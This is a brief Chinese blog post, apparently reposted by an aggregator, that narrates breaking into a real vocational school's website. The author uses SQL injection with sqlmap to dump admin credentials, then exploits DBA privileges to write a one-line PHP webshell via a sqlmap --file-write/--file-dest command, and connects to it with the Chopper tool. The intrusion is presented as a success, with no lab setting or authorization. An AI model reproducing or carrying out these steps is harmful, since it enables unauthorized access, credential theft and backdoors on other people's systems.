实战一个职业技术学校
Posted 某某qq2553083572
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了实战一个职业技术学校相关的知识,希望对你有一定的参考价值。
这是我们的目标,某一技术学院,这是一个注入点
上sqlmap
跑出了管理账号密码
扫后台
没有找到,注入就相当鸡肋了
换换其他思路
dba权限,想到了直接写入
找找路径之类的
找到了,运气相当的好
直接利用sqlmap写入一句话
语句*sqlmap,py -u “url” –file-write=”要写入本地文件路径”(注意为/) –file-dest=”网站路径/1.php”(注意为/)
访问空白,成功了,菜刀连接
shell到手。。。
以上是关于实战一个职业技术学校的主要内容,如果未能解决你的问题,请参考以下文章